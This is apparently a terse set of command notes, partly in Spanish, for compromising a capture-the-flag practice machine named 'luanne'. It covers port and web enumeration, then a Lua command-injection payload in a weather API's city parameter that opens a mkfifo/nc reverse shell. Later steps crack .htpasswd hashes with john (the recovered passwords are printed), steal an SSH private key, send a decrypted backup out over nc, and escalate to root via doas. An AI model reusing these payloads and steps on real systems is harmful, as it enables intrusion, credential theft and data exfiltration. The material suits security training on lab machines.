nmap -A -p- -oA output 10.129.151.88 --min-rate=10000 --script=vuln --script-imeout=15 -v
nmap -sC -sV -O -p- -oA luanne 10.129.151.88
nmap -sU -O -p- -oA luanne-udp 10.129.151.88
nikto -h 10.129.151.88 :80
whatweb http://10.129.151.88
http://10.129.151.88/robots.txt
wfuzz -c --hc=404 -t 200 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://10.129.151.88/weather/FUZZ
http://10.129.151.88/weather/forecast
curl -s -X GET "http://10.129.151.88/weather/forecast?city=London" | jq
Abrimos Burp Suite e interceptamos la petición
GET /weather/forecast?city=list
GET /weather/forecast?city=list']%3b+os.execute['id']--+-'
nc -lvnp 443
GET /weather/forecast?city=list']%3b+os.execute['rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 443 >/tmp/f']--+-'
Le hacemos Ctrl+U para aplicar URL-encode al payload
cat .htpasswd
Guardamos la línea de webapi_user (usuario y hash de su contraseña) en un archivo llamado hash
john --wordlist=/usr/share/wordlists/rockyou..txt hash
Credenciales-> webapi_user:iamthebest
ps -auwx
curl -s -X GET http://127.0.0.1:3001
curl -s -X GET http://127.0.0.1:3001/~r.michaels/id_rsa -u 'webapi_user:iamthebest'; echo
Creamos un archivo id_rsa con la clave privada obtenida
chmod 600 id_rsa
ssh -i id_rsa r.michaels@10.129.151.88
cd backups
cat devel_backup-2020-09-16.tar.gz.enc
netpgp --decrypt devel_backup-2020-09-16.tar.gz.enc --output /tmp/backup.tar.gz
nc 10.10.14.21 < backup.tar.gz
nc -lvnp 443 > backup.tar.gz
cat .htpasswd
vim hash2
john --worldlist=/usr/share/worldlists/rockyou.txt hash2
Credenciales->root:littlebear
doas su root